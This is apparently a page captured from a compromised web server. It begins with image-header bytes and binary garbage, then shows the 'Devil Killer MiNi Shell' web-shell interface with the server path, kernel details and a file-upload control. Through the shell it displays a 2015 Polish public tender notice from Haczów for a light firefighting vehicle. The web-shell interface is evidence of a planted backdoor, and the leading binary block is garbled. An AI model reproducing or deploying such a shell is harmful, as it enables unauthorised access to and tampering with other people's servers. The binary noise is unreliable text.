JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150716/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150716/179702-N-2015.html

<p class="kh_header"><b>Haczów: Dostawa  fabrycznie nowego  lekkiego samochodu ratowniczo - gaśniczego z napędem 4x2 - dla jednostki OSP w Malinówce .  (pojazd specjalny)</b><br>
<b>Numer ogłoszenia: 179702 - 2015; data zamieszczenia: 16.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Haczów , Haczów 573, 36-213 Haczów, woj. podkarpackie, tel. 013 4391002, faks 013 4391696.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.haczow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  fabrycznie nowego  lekkiego samochodu ratowniczo - gaśniczego z napędem 4x2 - dla jednostki OSP w Malinówce .  (pojazd specjalny).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia 
Przedmiotem zamówienia  jest  Dostawa  fabrycznie nowego  lekkiego samochodu ratowniczo - gaśniczego z napędem 4x2 - dla jednostki OSP w Malinówce .  (pojazd specjalny)1. Wymagania  ogólne 1 Przedmiotem zamówienia jest jednorazowy zakup i dostawa fabrycznie nowego lekkiego samochodu ratowniczo - gaśniczego z napędem 4x2 1.2 Samochód będzie służył ochronie przeciwpożarowej w jednostce Ochotniczej Straży Pożarnej  w Malinówce1.3 Miejscem odbioru zamówienia jest siedziba Wykonawcy. Przedmiot zamówienia  powinien spełniać następujące wymagania odpowiadać wszystkim cechom określonym w Specyfikacji Istotnych Warunków Zamówienia być fabrycznie nowym (rok produkcji 2015) i zgodny z obowiązującymi normami i przepisami. Podwozie musi posiadać aktualne świadectwo homologacji typu pojazdu, zgodnie z przepisami Ustawy z dnia 20 czerwca 1997r  Prawo o ruchu drogowym (tekst jednolity Dz. U nr 108, poz. 908, z 2005r., ze zmianami). Pojazd powinien spełniać wymagania polskich przepisów o ruchu drogowym zgodnie z Ustawą Prawo o ruchu drogowym z uwzględnieniem wymagań dotyczących pojazdów uprzywilejowanych i pojazdów specjalnych zgodnie z załącznikiem nr 4, tabela nr 3 kod 507   Rozporządzenia Ministra Infrastruktury z dnia 27 września 2003 r. w sprawach związanych z dopuszczeniem pojazdu do ruchu oraz wzorów dokumentów w tych sprawach. Pojazd powinien spełniać przepisy Polskiej Normy PN-EN 1846-1 oraz PN-EN 1846-2.Pojazd powinien spełniać Wymagania techniczno-użytkowe dla wyrobów służących zapewnieniu bezpieczeństwa publicznego lub ochronie zdrowia i życia oraz mienia, wprowadzanych do użytkowania  w jednostkach ochrony przeciwpożarowej - Rozporządzenie Ministra Spraw Wewnętrznych i Administracji Dz.U.2007.143.1002 z późn. zm. , i  Rozporządzenie  zmieniające  Dz.U. Nr 2010.85.553 (akt jednorazowy) Warunki szczegółowe 1.1.Pojazd musi spełniać wymagania techniczno-użytkowe określone w załączniku do rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r. w sprawie wykazu wyrobów służących zapewnieniu zasad bezpieczeństwa publicznego lub ochronie zdrowia i życia oraz mienia, a także zasad wydawania dopuszczenia tych wyrobów do użytkowania (Dz. U. Nr 143, poz. 1002) wprowadzonego rozporządzeniem zmieniającym, z dnia 27.04.2010 r. (Dz. U. Nr 85, poz. 553) wraz z uszczegółowieniem tych wymogów i wyposażeniem podanym poniżej.Pojazd musi posiadać świadectwo dopuszczenia do użytkowania w ochronie przeciwpożarowej na terenie Polski,a w przypadku pojazdów wyprodukowanych lub dopuszczonych do obrotu w innym państwie członkowskim Unii Europejskiej albo w Republice Turcji, jak również wyprodukowanych w innym państwie członkowskim Europejskiego Porozumienia o Wolnym Handlu (EFTA), dopuszczenie wydaje się po ustaleniu przez jednostkę dopuszczającą, że wyrób zapewnia bezpieczeństwo publiczne lub ochronę zdrowia i życia oraz mienia na poziomie nie niższym niż jest to określone w Polskich Normach. Świadectwo dopuszczenia należy dostarczyć najpóźniej w dniu odbioru techniczno- jakościowego.1.3.Pojazd musi spełniać przepisy Polskiej Normy PN-EN 1846-1 oraz PN-EN 1846-2.1.4.Pojazd fabrycznie nowy, rok produkcji podwozia i nadwozia (zabudowy pożarniczej) 2015, spełniający wymagania polskich przepisów o ruchu drogowym z uwzględnieniem wymagań dotyczących pojazdów uprzywilejowanych zgodnie z ustawą Prawo o ruchu drogowym. Podwozie z kabiną Pojazd powinien być oznakowany i wyposażony w urządzenia sygnalizacyjno-ostrzegawcze, świetlne i dźwiękowe wymagane dla uprzywilejowanego w ruchu pojazdu Państwowej Straży Pożarnej, a w szczególności: urządzenie dźwiękowe powinno umożliwiać podawanie komunikatów słownych, belka sygnalizacyjna z dwoma niebieskimi lampami wysyłającymi sygnał błyskowy i napisem STRAŻ, montowana na dachu kabiny pojazdu oraz pojedyncza lampa sygnalizacyjna niebieska wysyłająca sygnał błyskowy z tyłu pojazdu, dodatkowe dwie lampy sygnalizacyjne niebieskie wysyłające sygnał błyskowy z przodu pojazdu. Wszystkie lampy ostrzegawcze, głośniki, lampy oświetlenia pola pracy, lampy przednie oraz tylne pojazdu  zabezpieczone przed uszkodzeniem mechanicznym np. siatkami z drutu. Pojazd musi być oznakowany numerami operacyjnymi zgodnie z zarządzeniem nr 13 Komendanta Głównego Państwowej Straży Pożarnej z dnia 27 grudnia 2012 r. zmieniającym zarządzenie w sprawie gospodarki transportowej w jednostkach organizacyjnych Państwowej Straży Pożarnej (Dz. Urz. KG PSP Nr 1, poz. 8 z późn. zm.). Właściwy numer operacyjny zostanie podany w trakcie realizacji zamówienia.Maksymalna masa rzeczywista MMR samochodu gotowego do akcji ratowniczo-gaśniczej nie może przekroczyć masy całkowitej dopuszczalnej pojazdu określonej przez producenta podwozia.2.4. Podwozie pojazdu musi posiadać świadectwo homologacji typu, potwierdzające parametry podwozia i spełniać m.in. następujące warunki silnik, kabina i podwozie samochodu od jednego producenta (należy podać markę i model pojazdu), silnik czterosuwowy czterocylindrowy    o mocy min.120 KM o pojemności skokowej   nie mniejszej niż  2100 cm3 z zapłonem samoczynnym, turbodoładowany,  spełniający aktualnie obowiązujące  normy czystości spalin. Dopuszczalna masa całkowita - do 3500 kg , ładowność pojazdu po wykonaniu zabudowy pożarniczej w przedziale załogi i przedziale sprzętowym: min. 700 kg skrzynia biegów: Mechaniczna, minimum  5-cio biegowa, zsynchronizowana + bieg  wsteczny ,napęd: 4X2 , koła tylne  i przednie  pojedyncze układ kierowniczy: ze wspomaganiem, układ jezdny 4x2  ,opony  letnie uniwersalne , pełnowymiarowe koło zapasowe (zamawiający dopuszcza dostawę koła zapasowego luzem),dodatkowy zestaw kół wyposażony w opony zimowe, układ kierowniczy samochodu ze wspomaganiem, układ hamulcowy wyposażony w ABS i ESP, zaczepy holownicze z przodu i z tyłu umożliwiające odholowanie pojazdu, światła do jazdy dziennej uruchamiane po przekręceniu kluczyków.Kabina:czterodrzwiowa, jednomodułowa, 6-osobowa z układem siedzeń 2+4 usytuowanych przodem do kierunku jazdy. Wyposażenie kabiny fotele kierowcy i dowódcy z regulacją odległości i pochylenia oparcia, dodatkowo fotel kierowcy  z regulacją wysokości, cztery fotele dla załogi siedzącej w tylnym przedziale kabiny, wszystkie fotele wyposażone w bezwładnościowe pasy bezpieczeństwa, fotele pokryte materiałem łatwozmywalnym, odpornym na rozdarcie i ścieranie, tapicerka  foteli w ciemnoszarej  tonacji, indywidualne oświetlenie nad fotelem dowódcy na wysięgniku giętkim, dywaniki  gumowe z  wysokimi brzegami  przód i  tył, układ klimatyzacji, na przedział kabiny kierowcy i pasażerski, fabryczne radio samochodowe z  odtwarzaczem CD  z rozprowadzoną instalacją antenową  i głośnikową, reflektor ręczny (szperacz) do oświetlania numerów budynków zainstalowany w kabinie o mocy min. 55 W, zasilany z instalacji elektrycznej pojazdu, w kabinie kierowcy zainstalowany radiotelefon przewoźny, radiotelefon samochodowy o parametrach: częstotliwość VHF 136-174 MHz, moc 1÷25 W, odstęp międzykanałowy 12,5 kHz dostosowany do użytkowania w sieci MSWiA min. 128 kanałów, wyświetlacz alfanumeryczny min 14 znaków. Obrotowy potencjometr siły głosu. Samochód wyposażony w antenę ze sprężyną na pasmo radiowe 148 MHz umieszczoną na dachu kabiny. Radiotelefon zasilany oddzielną przetwornicą napięcia. Radiotelefon powinien być zaprogramowany zgodnie z dostarczoną przez Zamawiającego po podpisaniu umowy obsadą kanałową. Radiotelefon nasobny Motorola GP 360 lub inny  o równoważnych parametrach ,ładowarka  do  radiostacji  nasobnej,  elektrycznie regulowane szyby boczne w kabinie kierowcy, poduszki powietrzne dla kierowcy i  pasażera, centralny zamek z pilotem na wszystkie drzwi oraz  immobiliser, lusterka   sterowane elektrycznie, podgrzewane, lampy  przeciwmgielne  z  przodu i z  tyłu  pojazdu, Instalacja wyposażona w główny wyłącznik prądu odłączający wszystkie odbiorniki z wyjątkiem wymagających stałego zasilania. Oświetlenie przedziału ładunkowego włączane z kabiny kierowcy i niezależnie z przedziału pasażerskiego, dodatkowe gniazdo zapalniczki w kabinie kierowcy przenośna lampa halogenowa (szperacz) zasilana z gniazda zapalniczki 12V.-hak typu kulowego do przyczep o masie całkowitej nie przekraczającej 3500 kg, gniazdo elektryczne do przyczepy - znormalizowane gniazdo 12 V, 7-biegunowe, orurowanie   zewnętrzne  wzmacniające  zderzak  i  zabezpieczający  przednie światła, Ponadto w kabinie winno być co najmniej: zainstalowany głośnik zewnętrzny do radiotelefonu przewoźnego - głośnik od tego samego producenta, co radiotelefon ,umieszczona wizualna sygnalizacja otwarcia skrytek, podestów, podniesionego masztu oświetleniowego, włączonych przystawek odbioru mocy.Pojazd wyposażony w integralny układ prostowniczy do ładowania akumulatorów  z zewnętrznego źródła ~ 230V. Gniazdo przyłączeniowe umieszczone po lewej stronie. W kabinie kierowcy sygnalizacja wizualna i dźwiękowa podłączenia instalacji do zewnętrznego źródła. Moc alternatora i pojemność akumulatorów musi zapewniać pełne zapotrzebowanie na energię elektryczną przy jej maksymalnym obciążeniu w układzie ładowania radiotelefonów i latarek zamontowane zabezpieczenie przed nadmiernym rozładowaniem akumulatorów pojazdu (np. wyłącznik odłączający zasilanie). Pojazd wyposażony w sygnalizację świetlną i dźwiękową włączonego biegu wstecznego. Pojazd wyposażony w co najmniej:  zestaw narzędzi, klucz do kół, podnośnik hydrauliczny, przewód do pompowania kół z manometrem, trójkąt ostrzegawczy, apteczkę, gaśnicę proszkową o pojemności środka min. 1 kg. Oznakowanie  w taśmy odblaskowe po bokach pojazdu koloru żółtego oraz z przodu i tyłu pojazdu koloru biało-czerwonego orurowanie zewnętrzne wzmacniające zderzak i zabezpieczające przednie światła . Z tyłu pojazdu belka zespolona posiadająca żółte lampy tworzące falę świetlną (służąca do wskazywania kierunku omijania samochodu podczas akcji w warunkach drogowych). Fala świetlna - diody typu LED. Belka zespolona zabezpieczona przed uszkodzeniem mechanicznym. Kolor pojazdu nadwozie samochodu - RAL 3000żaluzje skrytek w kolorze naturalnego aluminium, błotniki i zderzaki - białe, podwozie  koloru czarnego. Pojazd wyposażony w wyciągarkę linową o napędzie elektrycznym i sile uciągu min.3,5 t. z liną o długości co najmniej 20 mb wychodząca z przodu pojazdu, której sterowanie realizowane ma być przewodowo z pulpitu przenośnego (traktowane zawsze jako podstawowe). Na wyjściu liny powinny znajdować się rolki umożliwiające odchylenie się liny podczas pracy, nie powodując jej zniszczenia, lina wyposażona w hak. Wyciągarka zabezpieczona przed warunkami atmosferycznymi w czasie jazdy samochodu (osłona lub pokrowiec). Wszelkie funkcje wszystkich układów i urządzeń pojazdu muszą zachować swoje właściwości pracy w temperaturze od -25stopni C do +35 stopni C. Zabudowa pożarnicza. Zabudowa wykonana z materiałów.Zabudowa szkieletowa z kształtowników ze stali nierdzewnej z ramą pośrednią aluminiową przykręcana do ramy podwozia, kontenerowa z blachy aluminiowej i nierdzewnej długość zabudowy 2650 mm. szerokość rolet bocznych po 2 rolety na stronę minimum 1000mm każda. Roleta w ścianie tylnej o szerokości 850mm.Poszycie zewnętrzne wykonane z gładkiej blachy ze stopu aluminium, lakierowane obustronnie. Dach zabudowy w formie platformy roboczej pokryty blachą aluminiową ze wzorem w wykonaniu antypoślizgowym. Na dachu pojazdu umieszczona skrzynia sprzętowa o pojemności minimum 0,2 m3. O dokładnym miejscu instalacji skrzyni decyduje Zamawiający. Konstrukcja  dachu powinna wytrzymać obciążenie masą dwóch strażaków i przewożonego sprzętu, drabin , skrzyni na sprzęt, węży ssawnych itp. Na dachu ma być zapewnione miejsce na uchwyty  drabiny nasadkowej  trzyelementowej   na trzy węże ssawne oraz  skrzynię na  drobny  sprzęt   , uchwyty  na  tłumnice  teleskopowe.Pojazd wyposażony w mocowania dla sprzętu i wyposażenia wymienionego w Załączniku nr 2 do SIWZ. Sposób mocowania uchwytów na sprzęt wymieniony w załączniku nr 2 do SIWZ należy uzgodnić z Zamawiającym.Drabina do wejścia na dach składana, z poręczami w górnej części ułatwiającymi wejście na dach, umieszczona z tyłu pojazdu. Szczeble w wykonaniu antypoślizgowym.Skrytki na sprzęt i wyposażenie zamykane żaluzjami wodo i pyłoszczelnymi wspomaganymi systemem sprężynowym, i zabezpieczającym przed samoczynnym zamykaniem, wykonane z materiałów odpornych na korozję wyposażone w zamknięcie typu rurkowego lub równoważne, zamki zamykane na klucz, jeden klucz powinien pasować do wszystkich zamków. Wszystkie żaluzje powinny posiadać taśmy ułatwiające zamykanie (wszystkie taśmy zainstalowane po prawej stronie skrytki). W kabinie kierowcy powinna być zainstalowana sygnalizacja otwarcia żaluzji skrytek.Uchwyty, klamki wszystkich urządzeń samochodu, drzwi żaluzjowych, szuflad, podestów i tac muszą być tak skonstruowane, aby możliwa była ich obsługa w rękawicach.Skrytki na sprzęt  muszą być wyposażone w oświetlenie włączane automatycznie po otwarciu drzwi skrytki.Pojazd powinien posiadać oświetlenie pola pracy wokół samochodu zapewniające oświetlenie w warunkach słabej widoczności min. 5 luksów w odległości 1 m od pojazdu.Półki aluminiowe mocowane do stelaża z możliwością regulacji wysokości i miejscem na niżej wymienione specjalistyczne wyposażenie pożarnicze, motopompę M8.8  TOHATSU VC72A,piłę do betonu i stali, piłę do drewna ,agregat prądotwórczy, pompę pływającą NIAGARA węże tłoczne W-52  5 odcinków  i W-75   3 odcinki, prądownice .  Szuflady i wysuwane tace muszą się automatycznie blokować w pozycji zamkniętej i całkowicie otwartej oraz posiadać zabezpieczenie przed całkowitym wyciągnięciem (wypadnięcie z prowadnic).Szuflady i tace wystające w pozycji otwartej powyżej 250 mm poza obrys pojazdu muszą posiadać oznakowanie ostrzegawcze.Skrytki na sprzęt  muszą być wyposażone w oświetlenie, główny wyłącznik oświetlenia skrytek powinien być zainstalowany w kabinie kierowcy. Ww. oświetlenie wykonane w technologii LED.Konstrukcja skrytek zapewniająca odprowadzenie wody z ich wnętrza.Wysuwany pneumatycznie, obrotowy maszt oświetleniowy podłączony do agregatu prądotwórczego, zabudowany na stałe w samochodzie z reflektorami LED. Wysokość min. 5 m od podłoża, na którym stoi pojazd do opraw czołowych reflektorów ustawionych poziomo, z możliwością sterowania reflektorami w pionie i w poziomie. Stopień ochrony masztu i reflektorów min. IP 54. Głowica masztu powinna być wyposażona w podstawę stabilizującą jej położenie w pozycji transportowej. Umiejscowienie masztu nie powinno kolidować ze skrzynią sprzętową oraz drabiną. Maszt oświetleniowy wyposażony w pokrowiec ochronny.Zamawiający wymaga, aby samochód oraz całość dostarczonego z nim wyposażenia objęte były minimum 24-miesięczną gwarancją ,  gwarancją  na perforację podwozia i nadwozia min. 2 lata. Gwarancją na lakier min. 2 lata oraz dodatkowo 6-miesięczną rękojmią poza okres gwarancji. 3.16. Minimum jeden punkt serwisowy podwozia (podać adres serwisu podwozia, najbliższy siedzibie Zamawiającego). Minimum jeden punkt serwisowy nadwozia (podać adres serwisu nadwozia najbliższy siedzibie Zamawiającego).Zamawiający wymaga, aby czas reakcji serwisu wynosił maksymalnie do 2 dni roboczych od czasu powiadomienia (przez czas reakcji rozumie się dotarcie serwisu na miejsce do Użytkownika lub przemieszczenie samochodu do siedziby serwisu).Siedziba serwisu gwarancyjnego na podwozie i nadwozie pojazdu nie może znajdować się w promieniu powyżej 150 km od siedziby zamawiającego; dopuszcza się wariant polegający na wykonywaniu napraw przez serwis Wykonawcy w siedzibie Zamawiającego. W innych przypadkach Wykonawca pokryje wszystkie udokumentowane koszty pośrednie związane z dostarczeniem pojazdu do serwisu. Okresy powyższe liczone są od daty odbioru potwierdzonego protokołem odbioru. Dodatkowo w terminie i miejscu odbioru faktycznego przedmiotu zamówienia Wykonawca będzie zobowiązany: a) przeprowadzić szkolenie wyznaczonych osób w zakresie podstawowej obsługi pojazdu oraz jego osprzętu b) zapewnić na własny koszt pełny zbiornik paliwa oraz uzupełnione inne płyny eksploatacyjne c) po prawidłowym odbiorze techniczno jakościowym na swój koszt: przeprowadzić przegląd techniczny, ubezpieczyć OC  jak również wykonać inne nieopisane czynności i formalności niezbędne do wywiązania się niniejszych obowiązków w terminie i dacie odbioru faktycznego.Wykonawca obowiązany jest do dostarczenia wraz z samochodem: świadectwa homologacji typu pojazdu ,zaświadczenie o przeprowadzanych dodatkowym badaniu technicznym wraz z opisem dokonanych zmian oraz adnotacją o spełnieniu przez pojazd warunków technicznych dla pojazdów specjalnych uprzywilejowanych w ruchu karta pojazdu książka gwarancyjna w języku polskim instrukcje obsługi w języku polskim do samochodu, zabudowy pożarniczej i zainstalowanych urządzeń i wyposażenia, dokumentacji niezbędnej do zarejestrowania samochodu, wynikającej z ustawy Prawo o ruchu drogowym.4.Cena brutto ma zawierać podatek VAT 8 procent.  Zgodnie z treścią art. 29 ust. 3 Prawo zamówień publicznych (Dz. U. z 2013 r., poz. 907 z późn. zm.)  jeżeli w opisie przedmiotu zamówienia wskazane są konkretne rozwiązania techniczne, dopuszcza się  stosowanie rozwiązań równoważnych, co do ich cech i parametrów, a wszystkie ewentualne nazwy  firmowe urządzeń i wyrobów użyte w opisie przedmiotu zamówienia powinny być traktowane jako definicje standardowe, a nie konkretne nazwy firmowe urządzeń wyrobów zastosowanych w dokumentacji. Obowiązek udowodnienia równoważności leży po stronie Wykonawcy.6.Szczegółowe  dane   dotyczące  pojazdu  znajdują  się w  załącznikach   nr 1  i  2  do  SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.14.42.10-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 18.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca posiada niezbędną wiedzę i doświadczenie, jeżeli wykaże się:
a) wykonaniem w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 dostawy lekkiego samochodu  ratowniczo  gaśniczego  o  parametrach  zbliżonych  do pojazdu  objętego  niniejszym  postępowaniem. 
Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez wykonawcę oraz na podstawie następujących dokumentów, jakie wykonawca powinien złożyć w postępowaniu:
wykaz wykonanych  , a w przypadku świadczeń okresowych lub ciągłych  również  wykonywanych , głównych  dostaw  w okresie ostatnich trzech lat przed upływem terminu składania ofert albo  wniosków  o  dopuszczenie  do  udziału  w  postępowaniu  , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, , wraz z podaniem  ich  wartości , przedmiotu, dat  wykonania  i podmiotów na rzecz których  usługi zostały  wykonane  oraz załączeniem dowodów czy  zostały wykonane  lub są wykonywane  należycie.
Dowodami są; poświadczenie , z tym, że w odniesieniu  do  nadal wykonywanych dostaw okresowych  lub ciągłych poświadczenie  powinno  być wydane nie wcześniej  niż na  3 miesiące przed upływem terminu  składania ofert. Jeżeli  z  uzasadnionych przyczyn   o obiektywnym charakterze  wykonawca nie jest  w  stanie  uzyskać poświadczenia, składa oświadczenie.
W przypadku gdy zamawiający jest podmiotem  na rzecz którego  roboty  budowlane   wskazane  w  wykazie  zostały wcześniej  wykonane, wykonawca nie ma  obowiązku przedkładania  dowodów  wyżej wymienionych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
